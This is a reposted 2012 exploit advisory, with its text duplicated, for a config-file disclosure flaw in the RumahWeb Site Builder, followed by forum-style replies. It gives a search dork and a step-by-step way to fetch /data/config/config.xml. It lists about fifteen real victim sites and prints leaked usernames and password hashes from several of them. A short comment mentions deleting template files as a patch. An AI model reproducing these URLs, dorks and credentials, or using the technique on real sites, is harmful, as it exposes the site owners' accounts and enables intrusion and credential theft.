Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 Desember 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb
Proof of Concept
================
[!] site/data/config/config.xml
For example you've searched it on google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml
-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or you got toyohashi-mosque.org/admin and you have to change the URL to oyohashi-mosque.org/data/config/config.xml
Example :
http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml
More results? http://pastebin.com/4VZpiC7e
Sumber : http://go.girilaya.com/0l0qwm
==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 Desember 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb
Proof of Concept
================
[!] site/data/config/config.xml
For example you've searched it on google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml
-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or you got toyohashi-mosque.org/admin and you have to change the URL to oyohashi-mosque.org/data/config/config.xml
Example :
http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml
More results? http://pastebin.com/4VZpiC7e
Sumber : http://go.girilaya.com/0l0qwm
Warga GIRILAYA
Learning By DOING
http://blog.girilaya.com/
<rows><domain>baccojakarta.com</domain><username>bacco751</username><password>2f18edd9ec46eeca15a4b759c96c0d0d</password></rows>
bagi teman2 yang sudah terlanjur memakai SITEBUILDer tersebut . .. jangan kwatir dan jangan underestimate dulu. . . ita juga bisa PATCHing koq... dengan menghapus Template dan menghapus template.xml yang ada di /data/config/template.xml.
contoh web diatas bisa terliat karena masih barusan dibuat dan belum diHapus Templatenya..
<rows><domain>pemikiranku.com</domain><username>pemik855</username><password>27a781f1f1ddde5ebc2dd2b796bfc736</password></rows>
<rows><domain>h2rtransport.com</domain><username>h2rtr239</username><password>c747ba108baa3d8212f86a319d445f7c</password></rows>
contoh web diatas bisa terliat karena masih barusan dibuat dan belum diHapus Templatenya..
- Spoiler:
<rows><domain>pemikiranku.com</domain><username>pemik855</username><password>27a781f1f1ddde5ebc2dd2b796bfc736</password></rows>
<rows><domain>h2rtransport.com</domain><username>h2rtr239</username><password>c747ba108baa3d8212f86a319d445f7c</password></rows>
Warga GIRILAYA
Learning By DOING
http://blog.girilaya.com/
http://www.autismajakarta.com/data/config/config.xml
0 komentar:
Posting Komentar